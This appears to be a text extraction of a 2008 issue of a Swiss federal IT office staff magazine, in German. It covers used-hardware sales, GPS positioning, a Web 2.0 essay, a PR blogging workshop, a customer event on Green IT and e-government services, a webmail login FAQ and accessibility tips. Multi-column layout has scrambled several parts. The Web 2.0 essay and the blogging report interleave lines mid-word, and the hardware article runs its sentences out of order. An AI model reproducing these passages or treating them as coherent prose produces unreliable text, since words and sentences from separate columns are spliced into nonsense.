Center 031 323 58 16 Text: Ernst Schlumpf Die bisherigen IT-Altmaterial-Verkäufe des BIT im Online-Shop www.auctionline.ch waren ein voller Erfolg: Die Anfang Jahr in punktuellen Aktionen angebotenen PCs, Notebooks, Bildschirme usw. gingen weg wie warme Semmeln. «Viele Computer-Nutzer sind nicht mehr bereit, die rasante – und teure – technische Entwicklung mitzumachen. Denn für viele Anwendungen genügen Geräte der letzten Generation vollkommen aus», sagt dazu Michel Sautter, Geschäftsführer der Swiss Remarketing AG. Seit Anfang Jahr arbeitet das BIT mit der auf den Vertrieb gebrauchter Computer-Hardware spezialisierten Unternehmung im aargauischen Dottikon zusammen. Aufgrund des grossen Erfolgs hat das BIT das ökologisch sinnvolle Hardware-Recycling nun ausgebaut. Neu werden sämtliche Geräte, für die das BIT, bzw. die BIT-Kunden keine Verwendung mehr haben, laufend der Aufbereitung und dem Verkauf durch Swiss Remarketing zugeführt. Das Delivery Center des BIT nimmt gerne Meldungen über weitere grössere Mengen Alt-Hardware entgegen, um sie ebenfalls auf diesem Weg einer Weiterverwendung zuzuführen. Somit gibt es fortan keine punktuellen Verkaufsaktionen mehr, sondern es sollte im Online-Shop immer ein genügend grosses Angebot an SecondhandHardware vorhanden sein, die vom Bundespersonal zu Vorzugskonditionen (und mit einer 30-tägigen Laufzeitgarantie) erworben werden kann. wer damit gearbeitet hat», sagt Michel Sautter. Das ist auch der Grund, warum es kein Vorrecht auf ein ganz bestimmtes Gerät, beispielsweise den eigenen, ausgemusterten Arbeits-PC, gibt. Die aufbereiteten PCs erhalten das Betriebssystem frisch installiert, Tastaturen und Mäuse werden in Behindertenwerkstätten oder Strafanstalten penibel gereinigt. Defekte und technisch überholte Hardware wird der fachgerechten Entsorgung zugeführt. Zugang nur mit Passwort Der Online-Shop von Swiss Remarketing hat zwei Bereiche: Einen passwortgeschützten für Firmen («PRO-Bereich») und einen öffentlich zugänglichen Bereich. Die Geräte des BIT werden zuerst im Firmen-Shop angeboten und – was übrig bleibt – nach einer gewissen Zeit in den öffentlichen Bereich transferiert. Auf den BIT-FirmenShop können nur Mitarbeitende der BIT-Kunden und des BIT zugreifen. Wer sich also eines der Occasions-Schnäppchen sichern will, holt sich auf dem BIT-Intranet das aktuell gültige Passwort und loggt sich damit auf www.auctionline.ch im «PRO-Bereich» ein. S’het solang’s het! Benutzername und Passwort für den Login finden Sie im Intranet BIT unter «Aktuell»: http://intranet.bit.admin.ch/aktuell Français Aufbereitung und Reinigung Bevor die Geräte im Online-Shop in den Verkauf kommen, bereiten die Fachleute von Swiss Remarketing sie professionell auf. Im gesicherten Wiederaufbereitungscenter werden die vorhandenen Daten auf den Datenträgern mit sehr rigiden Sicherheitsstandards gelöscht. «Somit kann man später unmöglich nachvollziehen, wo das IT-Equipment ursprünglich im Einsatz stand und Le matériel informatique usagé se vend bien L’OFIT vend du matériel usagé par l’intermédiaire du magasin en ligne «Auctionline». Tous les clients et les collaborateurs de l’OFIT peuvent profiter de cette offre qui a encore été développée dernièrement. Vous trouverez la version française de cet article sous www.bit.admin.ch/eisbrecher Eingeschoben 13 GPS und Co. Orientierung total «Bei der nächsten Abzweigung links abbiegen», weist uns eine mechanisch freundliche Stimme aus dem Lautsprecher den Weg. Doch wie weiss ein GPS-Navigationsgerät, wo es sich befindet und welchen Weg der Automobilist einschlagen muss? Text: Marc Bärtschi Das Global Positioning System, kurz GPS, ist wohl das bekannteste Positionsbestimmungssystem. Dieses besteht aus rund 30 Satelliten, die in 20 000 Metern Höhe ein Signal aussenden, mit dessen Hilfe ein GPS-Empfangsgerät seine aktuelle Position auf der Erdoberfläche ermitteln kann. Ausgerüstet mit einem entsprechenden Empfänger, steht GPS allen Menschen weltweit, zu jeder Zeit und kostenlos zur Verfügung. Und da die GPS-Geräte inzwischen erschwinglich geworden sind, erfreuen sie sich immer grösserer Beliebtheit. Zudem sind GPS-Empfänger nicht mehr nur etwas für Fachleute und TechnikBegeisterte. Auch im Alltag sind mehr und mehr Anwendungen möglich. Von einfachen Orientierungshilfen über Navigationssysteme für das Auto geht das Angebot heute bis hin zu Trainingsunterstützungen für Sport Treibende. Wie funktioniert GPS? Das Prinzip basiert, vereinfacht gesagt, auf demjenigen um die Entfernung eines Gewitters abzuschätzen: Man vergleicht die Zeitdifferenz zwischen Blitzschlag und Wahrnehmung des Donnergrollens. GPS funktioniert ähnlich: Um die exakte Positionsbestimmung zu ermöglichen, sendet jeder GPS-Satellit fortlaufend ein Signal, das seine Position sowie den Zeitpunkt des Signalversandes angibt. Um Folgeberechnungen zu erleichtern, sendet jeder Satellit zusätzlich noch Informationen über seine Umlaufbahn. Das Empfangsgerät bestimmt nun seine Position, indem es den Zeitpunkt der Signalabgabe mit demjenigen des Signalempfangs vergleicht. Aus der Zeitdifferenz errechnet sich die Distanz zum Satelliten. Français 3D-Positionsbestimmung mit 4 Satelliten: Anhand der Zeitdauer, mit der ein Satelliten-Signal bis zum GPS-Empfangsgerät unterwegs ist, errechnet dieses seine Distanz zu den einzelnen Satelliten und damit seine Position im Raum. Zur eindeutigen, dreidimensionalen Positionsbestimmung benötigt das Empfangsgerät das Signal von mindestens vier Satelliten. Zu diesen sollte möglichst eine uneingeschränkte «Sicht» herrschen, dann ist eine Genauigkeit bis auf wenige Meter möglich. Das Empfangsgerät L’orientation sans faille Une voix synthétique, agréable, nous indique la direction à suivre: «Au prochain carrefour, tournez à gauche». Mais comment un système de navigation peut-il savoir où il se trouve et quelle direction doit prendre l’automobiliste? C’est possible grâce au GPS et à des systèmes analogues. Vous trouverez la version française de cet article sous www.bit.admin.ch/eisbrecher Eingeschoben 14 berechnet aus den GPS-Signalen die Koordinaten seines aktuellen Standorts. Wenn in diesem kartografische Informationen hinterlegt sind, ist zudem eine visuelle Standortinformation auf einer Landkarte oder einem Stadtplan möglich. Ständige Neuberechnung der Position erlaubt darüber hinaus die Ermittlung der Bewegungsrichtung und der Geschwindigkeit. Ortung via Mobiltelefon: Pseudo-GPS Grundsätzlich ist die Positionsbestimmung auch mit einem Mobiltelefon möglich. Jeder Mobilfunkanbieter ist in der Lage, über die Funkzelle, in der sich das (eingeschaltete) Telefon befindet, seinen aktuellen Standort zu ermitteln. Diese Methode ist jedoch sehr ungenau. Je nach Dichte der Funktürme ist die Standortbestimmung von hundert Metern bis auf mehrere Kilometer genau. Seit GPS auch in den Mobiltelefonen Einzug gehalten hat, ist die Ortung derselben um ein Vielfaches exakter geworden. Normalerweise lässt sich ein GPS-Empfänger nicht orten, da diese Geräte nur passiv arbeiten. Für eine Überwachung via GPS benötigt man zusätzlich einen aktiven Sender, der die ermittelten Positionsdaten weitergibt. Im Beispiel des Mobiltelefons können diese Infos per SMS an einen Dritten gesendet werden. Bereits bieten einige Mobilfunkunternehmen ihren Kunden Ortungsservices an. So können verloren gegangene Telefone oder verlaufene Kinder wieder gefunden werden. Die User müssen allerdings der Herausgabe der Position des Mobiltelefons zustimmen. Ansonsten darf ein Mobilfunkunternehmen keinerlei Daten dieser Art an Dritte weitergeben. WLAN als GPS-Konkurrenz? In den USA ist unlängst ein weiteres Positionsbestimmungssystem eingeführt worden, das sich anhand von Funknetzwerken (WLAN) orientiert. Das funktioniert so: Jeder WLAN-Hotspot sendet ununterbrochen ein Signal aus, dessen Stärke sich messen lässt. Je weiter weg sich der Hotspot befindet, umso schwächer ist das Signal. Auf diese Weise lässt sich die Distanz des Messgerätes zum WLAN-Sender ermitteln. Wenn sich nun mehrere solcher Sender in der Umgebung befinden und die Position dieser bekannt ist, lässt sich daraus die eigene Position berechnen. Da Funknetzwerke mittlerweile auch in Privathaushalten weit verbreitet sind, ist die Positionsbestimmung mittels dieses neuen WPS (WLAN Positioning System) zumindest in Ballungsräumen praktisch flächendeckend möglich. Das Problem ist, dass die Standorte all der existierenden WLAN-Hotspots grundsätzlich nicht bekannt sind. Deshalb ist vor der Einführung erst eine aufwändige «Kartografierung» der bestehenden Hotspots erforderlich, welche in regelmässigen Abständen aktualisiert werden muss. Die Genauigkeit bewegt sich auch hier je nach Dichte der WLAN-Sender um die 20 Meter herum. Im Gegensatz zu GPS ist die Positionsbestimmung mit WPS aber auch in Innenräumen möglich. Wann WPS auch in Europa nutzbar wird, ist noch nicht bekannt. Die Kartografierung der europäischen Metropolen ist aber bereits im Gang. GPS: Geschichtlicher Hintergrund Realisiert wurde GPS vom amerikanischen Verteidigungsministerium und diente ursprünglich rein militärischen Zwecken. Vollumfänglich in Betrieb genommen wurde es 1995. Der zivilen Bevölkerung wurde die volle Funktionsbereitschaft von GPS erst im Jahr 2000 mit dem Abschalten der künstlichen Ungenauigkeit (Selective Availability) zur Verfügung gestellt. Lag die Genauigkeit von Positionsbestimmungen mit Selective Availability bei rund 100 Metern, so liegt sie heute bei ca. 15 Metern. Um ein präzises Zeitsignal zu liefern, sind die GPS-Satelliten mit Atomuhren ausgestattet. Neben dem militärischen Zweck kommt GPS heutzutage vorrangig in der Luft-, Land- und Seefahrtnavigation, aber auch bei Landvermessungen und anderen Anwendungen zum Einsatz, bei denen es auf die genaue Positionsbestimmung ankommt. Alternativ zu GPS sind momentan mehrere Länder parallel mit eigenen Entwicklungen satellitengestützter Systeme beschäftigt. Die meisten (z.B. Galileo, MTSAT) befinden sich allerdings noch in der Experimentierphase. Eingeschoben 15 Web 2.0 Eine vernetzte Geschichte Die Entwicklungsgeschichte des Homo sapiens sapiens – besser bekannt als der Mensch – verläuft irgendwie analog zu jener der Computer oder umgekehrt. In der Biologie nennt man das Ko-Evolution. Hier lesen Sie, wie sich das zugetragen hat – ausgeschmückt mit deutschen und englischen IT-Begriffen. Text: Ernst Schlumpf die das Jagen und Sammeln übersteigen. Mittlerweile waren eineinhalb Millionen Jahre oder so vergangen und ab jetzt ging alles sehr sehr schnell. Der Homo sapiens sapiens wurde industrialisiert, informatisiert und instrumentalisiert und er bekam Zeitungen, Post, Telefonie, Fotografie, Früher, als wir endlich von den Bäumen herunRadio, TV und ähnlich banale, mediale Mittel. tergekommen waren, da war wirklich alles ganz Das führte dazu, dass er bewusster wurde und anders: Da sass einer vor seiner Höhle mit dem auch immer mehr wusste und die konventionelriesigen Screen Natur vor den Augen und er len Mittel wie Briefe usw. nicht mehr ausreichüberlegte, wie er sich wohl am besten vernetzen ten, um dies zu verbreiten. Nun kam wieder könnte, um beim Jagen und Sammeln Erfolg zu einer und fand einen computergestützten Weg, haben. Er war eine Frühform des Networkers. Er dies zu tun. Er schrieb einen Dialekt (description realisierte recht schnell, dass er sich mit seinen language) namens HTML und via Protokoll (TCP/ Mitmenschen verständigen musste, erfand ein IP) konnten nun beliebig viele Files von einem paar Urlaute und schliesslich eine Sprache, eine Jäger und Sammler zum anderen verschoben Vorform einer description language, die genau werden. Das Internet (interconnected networks) bezeichnete, was gemeint war. Er realisierte, dass war entstanden. Davon gab es im Dienst World er in der Horde mehr Erfolg hatte und raufte Wide Web (WWW) eine Version 1.0. Die Version sich mit seinen Kollegen Web 1.0 mit HTML zusammen, betrieb also war eine Ansammeine Art Social Networlung statischer WebDie Schwerpunkte: king. Die Horde gab den sites, die sich via • Die Web-Evolution Erfolgs-Orten Namen. Hyperlink ansteuern • Web 2.0: Eine Linkliste im Intranet Das war aktives Tagging, liessen, aber auch ein • Nun sind Sie gefragt teilen Sie (uns) Ihr eine begriffliche und Datenmedium. Als Wissen (mit): [email protected] inhaltliche VerschlagworWeb 2.0 mit XML ist tung. Weil alles immer es ein dynamisches wieder vegessen ging, begann die Gruppe, die Informations-, Dialog- und Partizipationsmedium ersten Fonts zu entwickeln, Schriftzeichen und (Wiki) und als Web 3.0 mit OWL (Web Ontology Schriften, und diese in steinernen Wordtafeln Language) könnte es ein konnektives Wissensfestzuhalten. Die waren allerdings zu schwer medium (Semantic Web) werden. Optimisten und da es zudem immer mehr mitzuteilen meinen, dies sei dann die Wissensgesellschaft. gab, erfand einer das Papier (Paper, Sie träumen von der globalen Adaption des Document). Da immer mehr Leute verfügbaren Wissens (Wisdom of Crowds). Pessian diesen Dokumenten teilhaben misten meinen, dies sei die beginnende virtuelle wollten, kam ein weiterer Schlauer Gesellschaft (Virtual Society). Das meint nichts auf die Idee, diese Dokumente mehr und nichts weniger, als dass diese virtuelle zu kopieren (copy) Art der Gesellschaft nicht wirklich da ist, und nur und zu vervielso tut, wie wenn sie es wäre. fältigten (paste). Sie wurden Wie aber ist die heutige Lage zu beurteilen? in BuchdeNun, wir sind weder in der Zukunft noch in der ckel gepackt und in Gegenwart, wir sind einfach in einer Realität. Bibliotheken (archives) – eine Art Nicht in der Virtual Reality, sondern in der reeldata bases – gestellt. Unser Höhlen, tatsächlich Seienden. Da drinnen ist wirklich lenbewohner war in der Urform alles gleich wie früher. Wir sitzen vor unserem einer zivilisierten Gesellschaft kleinen Screen und suchen nach globalen Spuren angekommen, denn davon und Netzwerken. Etwas ganz Entscheidendes ist spricht man normalerweise, wenn dennoch bereits geschehen: Das früher als Web gewisse Skills beherrscht werden, 2.0 häufig herbeizitierte Semantic Web ist zwar Eingeschoben 16 bis heute nicht angekommen. Im Hintergrund hat sich aber, quasi als dessen Abfallprodukt, eine alternative 2.0-Variante etabliert: Das Mitmachweb, welches so heisst, weil es User generated, interaktiv, partizipativ und intermedial ist. Dieses Web 2.0 ist nach seinem Guru Tim O’Reilly eigentlich ein Marketingmodell (network marketing), eine Plattform auch, auf der kollektive Intelligenz genutzt wird. Die Datenaufbereitung ist zentral, Softwarelebenszyklen sind durch neue Programmiermodelle ersetzt, mobile Geräte sind integriert und der Desktop ist Webtop. Die Mitwirkung der Nutzer und Nutzerinnen ist die entscheidende Komponente: Sie entwickeln die Basistechnologien (Ajax, Content Syndication, offene APIs). Anwendungen und Funktionen werden von allen für alle zur Verfügung gestellt (Open Source und Free Software). Die Global markets sind vernetzt. Immer mehr Provider tummeln sich im Netz, sie beziehen Clients und Customers in ihre Services mit ein. Die Kunden und Kundinnen nehmen die Challenges an und teilen (share) ihr Know-how gegenseitig und nutzen es (Social Shopping). Sie treten in einer Zwitter-Rolle als Consumer und Producer gleich Prosumer auf und bieten ihre Products und ihr Know-how immer öfter in den Online-Shops der entsprechenden Labels / Brands an. Auf diese Weise entstehen neue Services und Märkte. Markt, Angebot, Nachfrage und Verhalten werden sehr direkt und entscheidend beeinflusst und verändert. Positive Interpreten sichten darin einen grossen Input an Kreativität bis hin zu «neuen Formen der Ich-Bildung» (der Trendforscher Andreas Haderlein). Kritiker wie der Internet-Unternehmer Andrew Keen sehen im Web 2.0 jedoch den Feind aller Kreativität und fürchten um das Individuum. Freuen wir uns also auf das Web 3.0! Es ist noch nicht ganz klar, was das denn sein soll/ wird. Es könnte aber das Semantic Web in einer bereits intelligenten Version sein, die gelernt hat, Daten logisch zu verknüpfen und zu verarbeiten und eine intelligente Umgebung zu schaffen (Ambient Intelligence, verwandt mit Ubiquitous Computing). In Web 4.0 schliesslich werden intelligente Applikationen den Usern und Userinnen selbständig weiterhelfen. Und so weiter. Tauchen wir ein und lassen wir uns überraschen. Wir begnügen uns an dieser Stelle vorerst einmal mit einer kleinen, aber feinen Auswahl an Web 2.0-Links, welche Sie im BIT-Intranet unter http://intranet.bit.admin.ch/eisbrecher finden. Bitte teilen Sie uns Ihre eigenen favorisierten Links mit, damit wir sie publizieren können: [email protected]. Events 17 Berner PR-Gesellschaft PR-Leute bloggen im BIT Blogs sind in aller Munde. Doch handelt es sich dabei bloss um eine Modeerscheinung, oder ist Bloggen heute ein unverzichtbarer Bestandteil der Unternehmenskommunikation? Ende Mai lud die Berner PR-Gesellschaft zu einem spannenden Workshop ins BIT, um dieser Frage auf den Grund zu gehen. BIT-Kontakt: Nora Kelemen, Bereichsleiterin Kundenkommunikation 031 323 38 47 Text: Leo Hauser Foto: Marc Bärtschi Der Anlass unter dem Titel «Blogs ... Modeerscheinung oder unverzichtbar?» fiel mit dem ersten richtigen Sommertag des Jahres 2008 zusammen. Doch trotz 30 Grad im Schatten strömten am frühen Abend des 27. Mai fast 90 geladene Teilnehmerinnen und Teilnehmer aus Privatwirtschaft und Bundesveraltung ins BIT-Hauptgebäude, die «Titanic II». Gerufen hatte die Berner Public Relations Gesellschaft (BPRG), die für ihre Mitglieder (zu denen auch das BIT gehört) regelmässig Events zu verschiedensten Themen und an wechselnden Orten organisiert. nem Blog zum Gespött machte und seine Kandidatur schliesslich zurückzog. Im Nu zum eigenen Blog Muss man Blogs wirklich lesen? Belanglose Inhalte, in der Szene liebevoll «Katzen-Content» genannt, gibt es in den Blogs en masse. Doch Beispiele dafür, dass einzelne Blogger mittlerweile ernstzunehmende Meinungsführer im Internet sind, wurden am BPRG-Anlass einige genannt. Und als Meinungsführer werden Blogger natürlich auch für PR-Fachleute interessant. Denn Blogger sind stark untereinander vernetzt. Suchmaschinen stufen Blogs hoch ein. Und Blogger können mit spezifischen Inhalten Themen setzen, popularisieren und einen Diskurs über diese Themen fördern. Bloggen als Lebensstil Nach einer kurzen Vorstellung des BIT durch Mediensprecher Claudio Frigerio gestaltete der Berner Journalist und Blogger Mathias Born (borniert.com; webflaneur.espace.ch) den Auftakt zum Blog-Anlass im BIT. In seinem erfrischenden In drei Workshops lernten die Teilnehmenden des Referat gewährte Born einen spannenden EinBPRG-Anlasses im BIT, wie man selbst Blogger blick in die Blogosphäre. Ein Blog, so definierte wird und was einen guten Blogger ausmacht. er in Anlehnung an die Wikipedia, sei ein auf Unter Anleitung von Caner Aslan (Microsoft einer Website geführtes, öffentliches Tagebuch, Schweiz) richteten die PR-Leute in Minutenhäufig endlos, das schnelle einen Blog heisst, aus einer ein und posteten langen chronoloihren ersten Beitrag. gisch sortierten Stefan Meierhans Liste von Einträ(ebenfalls Microsoft gen bestehend. Schweiz) sprach «Bloggen ist ein über Blog-Konzepte Lebensstil», pround zeigte am Beiklamierte Mathias spiel eines US-Blogs Born. Blogger über Hybridautos, seien besondere wie sich aus einMenschen, eben zelnen kritischen Menschen, die stets Blogbeiträgen nach nach Speziellem und nach eine groAusschau halten, sse Medienstory über das man blog- Klarsicht in der Blogosphäre dank Blogger Matthias Born spinnen kann. Wie gen könnte. Born wichtig darum wies aber darauf hin, dass der Schuss auch nach für Firmen ein systematisches Blog-Monitoring hinten losgehen könne, wie zum Beispiel bei ist, zeigte der dritte Workshop, wiederum mit jenem US-Präsidentschaftskandidaten, der sich Mathias Born. Bei einem feinen Apéro klang der 2003 nach allzu emotionalen Statements in seigelungene Event schliesslich aus. Events 18 Kundenanlass des BIT «BIT in Action»: Infos aus erster Hand Um vier spannende Themen kreiste die 7. Ausgabe des BITKundenevents «BIT in Action» vom 13. Juni 2008. Rund 100 Personen aus dem Kundenkreis des BIT folgten der Einladung in die Aula des Eidgenössischen Personalamtes. BIT-Kontakt: Jean-Pierre Beuret Account Manager 031 325 20 40 kundenkontakte@bit. admin.ch Text und Foto: Leo Hauser Zwei Prozent der weltweiten CO2-Emissionen gehen auf das Konto der IT. Das klingt zunächst nicht nach viel, entspricht aber dem Ausstoss aller Flugzeuge der Welt. Insofern wundert es nicht, dass die Energie- und Klimadiskussion längstens auch in der IT-Branche geführt wird. Die verschiedenen Lösungsansätze gruppieren sich unter dem Schlagwort Green IT. Zu diesem herausfordernden Thema sprachen am «BIT in Action» die Gastreferenten Markus Maag und Christoph Wittlinger von Fujitsu-Siemens. Der Vortrag verschaffte einen Überblick über den Label-Dschungel und die Referenten zeigten einen Server-Rechner, der im Betrieb 40% weniger Strom verbraucht. Auch ein Monitor, der im Standby-Modus keine Energie mehr verbraucht und der im Betrieb seine Helligkeit automatisch den Lichtverhältnissen anpasst, wurde vorgestellt. Schliesslich war zu erfahren, dass auch eine gute Hardware-Qualität für einen tieferen CO2-Ausstoss sorgt, weil das Auto der Servicetechniker öfter in der Garage stehen bleiben kann. Die Zukunft der Bundes-Telefonie Neben dem Gastreferat bildeten natürlich die BIT-Topics den thematischen Hauptharst des Kundenanlasses «BIT in Action». Im ersten Vortrag zu spezifischen BIT-Themen erfuhren die rund 100 Teilnehmenden Wissenswertes über das Projekt «Neue Telefonie Bundesverwaltung», welches von Levent Atak, Produktmanager Telekommunikation, und Kurt Schütz, Projektleiter Telekommunikation, vorgestellt wurde. Blickt man auf die heutige Situation, zeigt sich, dass noch immer ein Drittel der Telefonie-Endgeräte auf analoger Technologie basiert. Ins Auge sticht auch die grosse Anzahl Telefonanlagen – praktisch jedes Bundesgebäude verfügt über eine eigene Anlage. «Dies bringt hohe Betriebs- und Wartungskosten mit sich», betonte Kurt Schütz. «Darum soll das Projekt ‹Neue Telefonie› die Grundlage für eine bessere Skalierung liefern, woraus eine Reduktion der Anlagenzahl resultieren wird.» Weitere Stichworte für die Telefoniezukunft in der Bundesverwaltung sind sicherlich Voice over IP (VoIP) und Computer Telephony Integration (CTI), also computergestütztes Telefonieren. Ziel ist hier die Integration der Sprachdienste in die Büroautomation. Die Mitarbeitenden werden Telefonate via PC steuern können. Kurt Schütz: «Künftig klickt man in irgendeinem Dokument oder in den Outlook-Kontakten eine Telefonnummer an und die Telefonverbindung wird automatisch aufgebaut.» Weitere Fixpunkte sind «One Phone» (ein Gerät, das Festnetzgerät und Handy vereinigt), bzw. «One Number» (eine einzige Nummer für verschiedene Arbeitsorte). Die heutige Telefoninfrastruktur glänzt durch eine Verfügbarkeit von 99,999 Prozent. Diese hohe Stabilität soll natürlich auch in Zukunft beibehalten werden. Darum baut das Projekt «Neue Telefonie» auf einem evolutionären Vorgehen, auf einer so genannten Soft Migration. Das Telefonie-Projekt des BIT befindet sich heute in der Konzeptphase. Formular-Service spart Zeit Der Formular-Service des BIT war der nächste Punkt auf der Themenliste des «BIT in Action». Alain Barras, Entwicklungsverantwortlicher des CC Internet, legte die Argumente dar, die für elektronische Formulare sprechen und zeigte den Einsatz an einem praktischen Beispiel auf. Dass elektronische Formulare mithelfen, Papier einzusparen (Stichwort Green IT!), liegt auf der Hand. Doch ermöglichen die E-Formulare auch viele Funktionen, die kein Papierformular bietet. So können verschiedene Formulare miteinander vernetzt und gruppiert, und natürlich die Bearbeitung der Eingaben automatisiert werden. Die rationelle und zentralisierte Verarbeitung erlaubt eine beachtliche Zeitersparnis und erhöht nicht zuletzt auch die Datensicherheit. Das beim Formular-Service des BIT zum Einsatz kommende Produkt ist Jaxforms der Zürcher Firma xcentric. «Jaxforms ist browserbasiert, man braucht dafür also keinerlei zusätzliche Software zu installieren», erklärte Alain Barras. Zu den weiteren Pluspunkten gehört die Möglichkeit, individuelle Regeln für die Plausibilität von Formulareingaben zu definieren, zum Beispiel die automatische Prüfung der Schreibweise einer E-Mail-Adresse. An einem Prototyp für das Bundesamt für Landwirtschaft demonstrierte Alain Barras den praktischen Einsatz des Formular- Events 19 Services. So auch die Möglichkeit, ein angefangenes Formular – gesichert durch ein Passwort – online zwischenzuspeichern und zu einem späteren Zeitpunkt zu vervollständigen. Ebenso kann der Benutzer bei Bedarf eine PDF-Quittung des ausgefüllten Formulars ausgestellt bekommen, etwa wenn seine eigenhändige Unterschrift auf dem Formular erforderlich ist. E-Gov-Services in der SOA Der Formular-Service ist einer der Bausteine der service-orientierten Architektur (SOA). Die SOA dreht sich in der Bundesverwaltung vor allem um die Realisierung von modularen E-GovernmentServices. Über die SOA Basis Services verschaffte Bereichsleiter Fernand Hänggi in seinem Referat im Rahmen des «BIT in Action» einen Überblick. Der neu gegründete Bereich SOA Basis ist in der Abteilung E-Government im Lösungszentrum des BIT angesiedelt. «Unser Bereich stellt die Schnittstelle zwischen IT-Architektur, den Entwicklern der Services sowie dem Betriebszentrum sicher», erklärte Fernand Hänggi. Wichtige Grundlage einiger angebotener Services ist die OSCI-Infrastruktur (OSCI = Online Services Computer Interface), die den sicheren, robusten und nicht abstreitbaren Datenaustausch unterstützt. Diese Infrastruktur eignet sich auch für grosse Datenmengen und wird beispielsweise für die Volkszählung 2010 eingesetzt. Die Services im Einzelnen umfassen heute, neben dem Formular-Service, den AdressverifikationsService zur Überprüfung von Postadressen (verfügbar als Web-Service), den E-Payment-Service für die Bezahlung per Kreditkarte, den Protokollierungs-Service für das zentrale Logging von Informationen in einer Datenbank und den Publish/Subscribe-Service zur Verwaltung von Verteilerlisten. Weitere Services in der SOA beinhalten das Access und Identity Management sowie das Service-Portal zur Verwaltung von implementierten Services (derzeit in der Pilotphase). Den Abschluss des «BIT in Action» bildete wie immer ein Stehlunch, Gelegenheit sich über das Gehörte und Gesehene auszutauschen. Tipp. Den kompletten Foliensatz des «BIT in Action» finden Sie im Intranet BIT (intranet.bit. admin.ch) unter «Aktuell» > «Veranstaltungen». Die Referenten des 7. «BIT in Action» (von hinten links): Markus Maag, Daniel Feldmann (beide Fujitsu-Siemens), Kurt Schütz (Projektleiter Telekommunikation), Levent Atak (Produktmanager Telekommunikation), Alain Barras (Informationssystem-Architekt CC Internet), Christoph Wittlinger (FujitsuSiemens), Jean-Pierre Beuret (Account Manager BIT), Fernand Hänggi (Bereichsleiter SOA Basis), René Sprecher (Bereichsleiter Account Management), Romi Meyer (Leiterin Abteilung Kunden) BITS & Bytes 20 › FAQ Die komplexe Welt der (Bundes-)IT wirft im Alltag der Userinnen und User immer wieder Fragen auf. In jedem «Eisbrecher» beantwortet der Service Desk BIT einige dieser «frequently asked questions» (FAQ). Wo finde ich das Benutzerhandbuch zu Outlook Web Access? Dank Outlook Web Access (OWA) haben Sie von zu Hause oder von unterwegs Zugriff auf Ihre geschäftliche Mailbox. Die Bedienung von OWA ist keine Hexerei. Trotzdem ist es wissenswert, wie sich OWA und Outlook im Funktionsumfang unterscheiden. Auch die besonderen Sicherheitshinweise für OWA sollte man sich regelmässig in Erinnerung rufen. Alle diese Informationen finden Sie im kompakten Benutzerhandbuch. Dieses liegt im Intranet BIT auf Deutsch und Französisch vor: http://intranet.bit.admin.ch > Angebote > Büroautomation > Outlook Web Access Global Woran erkenne ich die korrekte Loginmaske für RAS-Dienste des BIT? Grundsätzlich sind die beiden Dienste OWA und Full Network Access (RABA) zu unterscheiden. In beide loggen Sie sich über das RAS-Portal ein, jeweils via eine eigene Zugangsseite: OWA => https://webmail.admin.ch RABA => https://ras.admin.ch/[departement] (Bsp. EFD: https://ras.admin.ch/efd) Welche Login-Maske Sie vor sich haben, sehen Sie auf der Titelleiste des Browserfensters: «OWA Logon» für OWA und «RAS Logon» für RABA. Beim Klick auf mein Webmail-Bookmark erhalte ich die falsche Login-Maske. Geben Sie die Adresse des Webmail-Dienstes ein, werden Sie automatisch auf die Webmail-LoginMaske auf dem RAS-Portal umgeleitet. Wenn Sie jedoch direkt auf diese Seite bookmarken, erhalten Sie beim nächsten Aufruf nicht die gewünschte Login-Maske, denn der Einstieg muss aus technischen Gründen immer über die Webmail-Adresse https://webmail.admin.ch geschehen. Ändern Sie also in den Lesezeichen Ihren Webmail-Bookmark manuell auf diese Adresse. KlJ Störungsmeldungen Die aktuellen Störungsmeldungen finden Sie jeweils auf der Startseite des Intranet BIT: http://intranet.bit.admin.ch › Kurz notiert Neue Anleitung: Barrierefreies Content-Filling mit Imperia Internetangebote der Bundesverwaltung müssen von Gesetzes wegen barrierefrei gestaltet sein. Barrierefrei bedeutet, dass die Webseiten so gestaltet sind, dass auch Menschen mit Seh- oder Hörbehinderung, motorischer oder kognitiver Behinderung die Inhalte nutzen können, gegebenenfalls mit Hilfsmitteln wie dem Screen-Reader. Auf der technischen Seite erfüllt Imperia, das vom BIT für Kundenwebsites verwendete Content Management System (CMS), diese Anforderung und hat auch im Praxistest bestanden. Ein wirklich barrierefreies Webangebot erhält man aber erst, wenn auch die Inhalte im CMS so eingepflegt werden, dass sie hernach für alle nutzbar sind. So bleibt Sehbehinderten das schönste Foto unerschlossen, wenn der Online-Redaktor beim Content-Filling keine aussagekräftige Text-Alternative miterfasst. In der Bundesverwaltung nehmen nicht weniger als 700 Personen Aufgaben im Bereich ContentFilling mit dem CMS Imperia wahr. An ihnen liegt es, im täglichen Gebrauch des CMS einige wenige, aber umso wichtigere Punkte zu berücksichtigen und damit einen Beitrag zum hürdenfrei zugänglichen Bundes-Web zu leisten. Worauf es beim Content-Filling konkret ankommt, haben die Accessibility-Fachleute des BIT in einem 16-seitigen PDF-Dokument für alle Imperia-Redaktorinnen und -Redaktoren zusammengefasst. Die nützliche Anleitung mit dem Titel «Barrierefreies Content-Filling mit Imperia», die in Zusammenarbeit mit der Stiftung «Zugang für alle» entstanden ist, kann in den Imperia-Kundenauftritten (im Hauptmenü unter «Imperia Information Village») abgerufen werden. Das Dokument steht, nebst vielen weiteren Materialien zum Thema, auch auf dem Accessibility-Portal im BIT-Intranet zur Verfügung: http://intranet.bit.admin.ch/barrierefrei HL BITS & Bytes 21 › Kurz gelesen Web 2.0: Das Einsteiger-Handbuch «Web 2.0» von Tom Alby kann man getrost als ideale Einsteigerfibel ins Thema Mitmachweb bezeichnen. 2006 erstmals erschienen, liegt das Buch seit kurzem in einer dritten, überarbeiteten Auflage vor. Es richtet sich an alle, die das Web 2.0 verstehen und beim Thema mitreden können wollen und ist für jeden interessierten Internetnutzer verständlich geschrieben. Tom Alby beleuchtet in «Web 2.0» Konzepte und Anwendungen stärker als die Technologien (das Buch enthält keine Codes). Nach der Lektüre des Buches sind Begriffe wie Blog und Podcast, RSS und Ajax geläufig, die Leserin oder der Leser weiss, was «Social Softwares» wie zum Beispiel Flickr, Xing und Twitter zu bieten haben oder was sich mit BitTorrent, Mashups oder Skype alles anstellen lässt. Dabei beschränkt sich der Autor sehr weitgehend auf die grossen Anwendungen des Web 2.0. Tiefer geht Alby lediglich beim Thema Blogs. Nur kurz angeschnitten werden Begriffe wie die Folksonomy (das gemeinschaftliche Indexieren) oder Geschäftsmodelle wie der Long Tail (E-Commerce mit Nischenprodukten). Natürlich fehlt nicht ein Ausblick auf das Web 